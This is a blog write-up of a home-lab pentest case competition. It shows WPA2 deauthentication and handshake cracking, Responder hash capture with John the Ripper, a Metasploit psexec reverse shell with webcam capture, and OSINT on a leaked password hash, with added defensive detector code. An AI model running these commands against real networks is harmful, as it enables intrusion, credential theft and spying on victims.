One Eyed Techs


06/09-2018

Case Competition

This scenario was written as a case competition for a cyber security presentation. The presentation treated the scenario as a penetration test of an online company offering backups in the cloud. The name of the company is Digi-Sikring ApS.

No laws were broken in creating and documenting this scenario. All tests were performed on my private property.

The following segment of the scenario is executed as an external threat agent.


Part 1: Got wifi?

First step is to enable monitor mode on the network interface card.

root@parrot:~$ sudo airmon-ng start wlan0

[Screenshot: Monitor mode]

Next up, I'm scanning wireless networks with the network card in monitor mode.

This is done with the following command:

root@parrot:~$ sudo airodump-ng wlan0mon

While scanning, a network called digisikringaps-2.4Ghz appears.

[Screenshot: Airodump]

The next step is to narrow the monitoring down to the network of interest. With the following command, the network digisikringaps-2.4Ghz is monitored on channel 1, and the captured data is saved to the Desktop.

root@parrot:~$ sudo airodump-ng -c 1 --bssid E0:B9:E5:A5:4D:27 -w /home/root/Desktop/digisikringaps-wifi wlan0mon

[Screenshot: Airodump Digi Sikring ApS]

The files with the captured data are stored on the Desktop, the most important being the .cap file. It becomes far more interesting once it contains the four-way handshake, which is the authentication exchange used by networks with WPA2 encryption.

[Screenshot: Capture files]

To capture the four-way handshake, a device needs to authenticate with the network. Instead of waiting for that to happen, a deauthentication attack can be launched against connected devices. This forces the devices off the network; they will most likely auto-reconnect, enabling me to capture the handshake. To launch the deauthentication attack against the only connected device, the following command is executed:

root@parrot:~$ sudo aireplay-ng -0 2 -a E0:B9:E5:A5:4D:27 -c 84:29:99:18:CD:33 wlan0mon

The attack was successful, and the terminal monitoring the network now displays the capture of the four-way handshake.

[Screenshot: Airodump handshake]
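The deauthentication burst described above is also visible to a defender watching the same channel. The following is an added example, not part of the original write-up: a minimal 802.11 management-frame parser and a sliding-window detector that flags a BSSID emitting many deauthentication frames in a short interval. The frames are constructed in memory (no capture involved), the MAC addresses are the ones from this write-up, and the window and threshold values are assumptions to tune per environment.

```python
import struct
from collections import defaultdict

def mac(s): return bytes.fromhex(s.replace(":", ""))
def fmt_mac(b): return ":".join(f"{x:02X}" for x in b)

def parse_frame(raw):
    """Parse the 24-byte 802.11 MAC header (no radiotap header). Returns None if too short."""
    if len(raw) < 24:
        return None
    fc0 = raw[0]
    frame = {
        "type": (fc0 >> 2) & 0x3,      # 0 = management, 1 = control, 2 = data
        "subtype": (fc0 >> 4) & 0xF,   # management subtype 12 = deauthentication
        "addr1": fmt_mac(raw[4:10]),   # destination for management frames
        "bssid": fmt_mac(raw[16:22]),
    }
    if frame["type"] == 0 and frame["subtype"] == 12 and len(raw) >= 26:
        frame["reason"] = struct.unpack("<H", raw[24:26])[0]  # deauth body: reason code
    return frame

def build_mgmt_frame(subtype, dst, src, bssid, body=b""):
    """Constructed management frame: frame control, duration, 3 addresses, sequence control, body."""
    return bytes([subtype << 4, 0]) + b"\x00\x00" + mac(dst) + mac(src) + mac(bssid) + b"\x00\x00" + body

def detect_deauth_bursts(frames, window=1.0, threshold=5):
    """frames: iterable of (timestamp, raw). Returns {bssid: peak deauth count seen in any window}."""
    times_by_bssid = defaultdict(list)
    for ts, raw in frames:
        f = parse_frame(raw)
        if f and f["type"] == 0 and f["subtype"] == 12:
            times_by_bssid[f["bssid"]].append(ts)
    alerts = {}
    for bssid, times in times_by_bssid.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:  # slide the window forward
                start += 1
            if end - start + 1 >= threshold:
                alerts[bssid] = max(alerts.get(bssid, 0), end - start + 1)
    return alerts

# Constructed sample: 3 beacons, a 12-frame deauth burst against the client, one lone deauth elsewhere.
AP, CLIENT, OTHER_AP = "E0:B9:E5:A5:4D:27", "84:29:99:18:CD:33", "00:11:22:33:44:55"
SAMPLE = [(i * 0.1, build_mgmt_frame(8, "FF:FF:FF:FF:FF:FF", AP, AP)) for i in range(3)]
SAMPLE += [(1.0 + i * 0.02, build_mgmt_frame(12, CLIENT, AP, AP, struct.pack("<H", 7))) for i in range(12)]
SAMPLE += [(5.0, build_mgmt_frame(12, CLIENT, OTHER_AP, OTHER_AP, struct.pack("<H", 3)))]
```

A single deauthentication from the other BSSID stays below the threshold, so only the burst against the client is reported.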

If the .cap file is opened in Wireshark, the four-way handshake can be seen. It uses EAPOL (Extensible Authentication Protocol over LAN), which is the authentication protocol.

[Screenshot: EAPOL capture]

With the handshake in the .cap file, the password can be cracked with the aircrack tool from the aircrack-ng suite. This allows the attacker to brute-force the password with words from a password list.

The command executed is as follows.

root@parrot:~$ sudo aircrack-ng -a2 -b E0:B9:E5:A5:4D:27 -w /usr/share/wordlists/fern-wifi/common.txt /home/root/Desktop/digisikringaps-wifi/*cap

Since the wireless network password is in the wordlist used, it is cracked within seconds.

[Screenshot: Aircrack]

Part 2: Houston, we have a shell

After connecting to the network, I'd like to determine the default gateway in order to discover hosts connected to the network.

root@parrot:~$ route -n

[Screenshot: Default Gateway]

The default gateway is 192.168.1.1. To discover connected hosts, I'll scan every IP address on the network using nmap.

root@parrot:~$ sudo nmap -sP -PI -PT 192.168.1.0/24

[Screenshot: Nmap Scan]

The connected device with IP 192.168.1.112 looks like a Windows machine. Let's target that. To attack the device, I'll use Responder. When a non-existent hostname is entered into a browser, the computer asks the other devices on the network whether they recognize the hostname. Responder answers that it is the host behind the unrecognized hostname, and the target computer then sends its login credentials: the username in cleartext and the password as an NTLMv2 hash.

root@parrot:~$ sudo responder -I wlan0 -wv

[Screenshot: Responder]
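The name-poisoning step Responder performs can be detected from the wire side: a defender queries a few "canary" hostnames that are known not to exist, and any host that answers for them is a poisoner. Added example, not from the original post: a parser for LLMNR messages (RFC 4795 reuses the DNS header, question and resource-record wire format) and a check that flags responses resolving a canary name. The sample messages are constructed in memory, and the answering address 192.168.1.162 is the attacker host from this write-up.

```python
import struct
def read_name(buf, off):
    """Decode a DNS-style name at buf[off]; follows a compression pointer (0xC0xx) and resumes after it."""
    labels, resume = [], None
    while True:
        length = buf[off]
        if length & 0xC0 == 0xC0:
            resume = resume or off + 2
            off = struct.unpack("!H", buf[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if length == 0:
            return ".".join(labels), (resume or off)
        labels.append(buf[off:off + length].decode("ascii"))
        off += length

def parse_llmnr(buf):
    """Parse an LLMNR message: DNS-style header, questions (skipped) and answer records."""
    ident, flags, qd, an, _ns, _ar = struct.unpack("!6H", buf[:12])
    off, answers = 12, []
    for _ in range(qd):
        name, off = read_name(buf, off)
        off += 4                                     # skip QTYPE and QCLASS
    for _ in range(an):
        name, off = read_name(buf, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", buf[off:off + 10])
        rdata, off = buf[off + 10:off + 10 + rdlen], off + 10 + rdlen
        value = ".".join(map(str, rdata)) if rtype == 1 and rdlen == 4 else rdata.hex()
        answers.append((name, rtype, value))
    return {"id": ident, "is_response": bool(flags & 0x8000), "answers": answers}

def build_response(ident, name, ip):
    """Constructed LLMNR response: header with QR=1, the echoed question, one A record via a name pointer."""
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"
    header = struct.pack("!6H", ident, 0x8000, 1, 1, 0, 0)
    answer = b"\xC0\x0C" + struct.pack("!HHIH", 1, 1, 30, 4) + bytes(int(o) for o in ip.split("."))
    return header + qname + struct.pack("!HH", 1, 1) + answer

def poisoned_answers(messages, canary_names):
    """Return (name, ip) for every response that resolves a name the defender knows does not exist."""
    canaries, hits = {n.lower() for n in canary_names}, []
    for raw in messages:
        msg = parse_llmnr(raw)
        if msg["is_response"]:
            hits += [(n, ip) for n, rtype, ip in msg["answers"] if rtype == 1 and n.lower() in canaries]
    return hits

# Constructed capture: a poisoned answer for a canary name, and a normal answer for a real printer.
SAMPLE = [build_response(0x1234, "fileserver-typo", "192.168.1.162"), build_response(0x1235, "printer01", "192.168.1.50")]
CANARIES = ["FILESERVER-TYPO"]
```

Disabling LLMNR and NetBIOS name resolution on the Windows hosts removes the question Responder relies on; the check above is for confirming that nobody is answering it in the meantime.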

The hashes are stored in /usr/share/responder/logs.

root@parrot:~$ cd /usr/share/responder/logs 

I'll use John the Ripper to attempt to crack the NTLMv2 hash.

root@parrot:~/usr/share/responder/logs$ john SMBv2-NTLMv2-SSP-192.168.1.112.txt

[Screenshot: John the Ripper]

John cracked the NTLMv2 hash in under a second. This emphasizes the importance of not relying on a weak password.

The psexec module allows for authenticated remote code execution on a target system. Let's use a reverse shell as the payload to execute.

First some parameters are to be set.

root@parrot:~$ msfconsole
msf > use exploit/windows/smb/psexec
msf exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/smb/psexec) > set smbuser johs
msf exploit(windows/smb/psexec) > set smbpass password1
msf exploit(windows/smb/psexec) > set lhost 192.168.1.162
msf exploit(windows/smb/psexec) > set rhost 192.168.1.112

And finally.

msf exploit(windows/smb/psexec) > exploit

[Screenshot: Metasploit]

We're in. Printing the working directory lets us know that we have a shell open in C:\Windows\System32.

Furthermore, we can launch Armitage, a graphical user interface for the Metasploit framework, and grab a picture through the webcam of the compromised computer.

[Screenshot: Armitage Webcam]

Part 3: Correct horse battery stable

The third part is an example of compromising an employee from the outside. Using Maltego, we can search for the employee's name.

An e-mail address is associated with the name of the employee. Digging a little deeper, it appears that the employee's e-mail address has been part of a password leak.

[Screenshot: Maltego]

Obtaining the LinkedIn database lets us find the SHA1 hash of the password used.

[Screenshot: LinkedIn]

SHA1 is not considered safe as of 2018. Searching for the hash in online databases revealed that it had indeed already been cracked.

[Screenshot: Maltego]
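The lookup above works because the leaked hashes are unsalted SHA1: the same password always yields the same digest, so one precomputed table answers for everyone. Added example, not part of the original write-up: screening a candidate password against a breach corpus the way a k-anonymity range query does (only the first five hex characters of the hash leave the host), next to a salted PBKDF2 digest that shows why that kind of lookup fails against properly stored passwords. The corpus, its occurrence counts and the range_query stand-in for a network call are all constructed here.

```python
import hashlib

def sha1_hex(password):
    """Unsalted SHA1 of the password as a hex string, the form the leaked hash on this page has."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()

def range_query(prefix, breached_hashes):
    """Stand-in for a k-anonymity range lookup: return only the suffixes (with counts) that share
    the 5-character prefix. A real service answers this without ever seeing the full hash."""
    return {h[5:]: count for h, count in breached_hashes.items() if h[:5] == prefix}

def is_breached(password, breached_hashes):
    """Screen a candidate password; returns how often it appears in the corpus (0 = not seen)."""
    digest = sha1_hex(password)
    prefix, suffix = digest[:5], digest[5:]
    suffixes = range_query(prefix, breached_hashes)   # in production: an HTTPS call carrying only the prefix
    return suffixes.get(suffix, 0)

def salted_hash(password, salt, iterations=100_000):
    """What the page's lookup cannot index: a salted, deliberately slow PBKDF2-HMAC-SHA256 digest."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations).hex()

# Constructed breach corpus: hashes of a few known-leaked passwords with made-up occurrence counts.
BREACHED = {sha1_hex(p): n for p, n in [("password1", 2401), ("linkedin", 1337), ("123456", 99999)]}
```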

This concludes the hypothetical pentest done as a case competition.